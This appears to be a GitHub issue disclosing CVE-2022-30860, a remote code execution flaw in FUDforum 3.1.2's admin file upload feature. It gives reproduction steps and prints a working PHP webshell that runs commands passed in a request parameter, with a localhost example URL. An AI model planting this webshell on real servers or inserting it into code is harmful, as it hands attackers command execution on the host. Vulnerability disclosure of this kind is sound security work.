Headline
CVE-2022-30860: Remote code execution bug · Issue #23 · fudforum/FUDforum
FUDforum 3.1.2 is vulnerable to Remote Code Execution through Upload File feature of File Administration System in Admin Control Panel.
Remote code execution with File Administration System feature in Admin Control Panel Site
Affected Version- 3.1.0
Demo installation: https://localhost/FUDforum-3.1.2/
Steps to reproduce the bug:
1 : go to http://localhost/FUDforum-3.1.2/ and login with admin account
2 : go to Admin Control panel and access to http://localhost/FUDforum-3.1.2/adm/admbrowse.php?&SQ=59a844c7073e3a8d98026d324884a119
3 : Use File to upload Feature in File Administration System to Upload PHP Webshell PHP to Webroot Directory
WebShell payload:<?php if(isset($_REQUEST[‘cmd’])){ echo "<pre>"; $cmd = ($_REQUEST[‘cmd’]); system($cmd); echo "</pre>"; die; }?>
4 : Access to webshell and get remote execution code.
Example : http://localhost/FUDforum-3.1.2/2test1.php?cmd=ls%20-la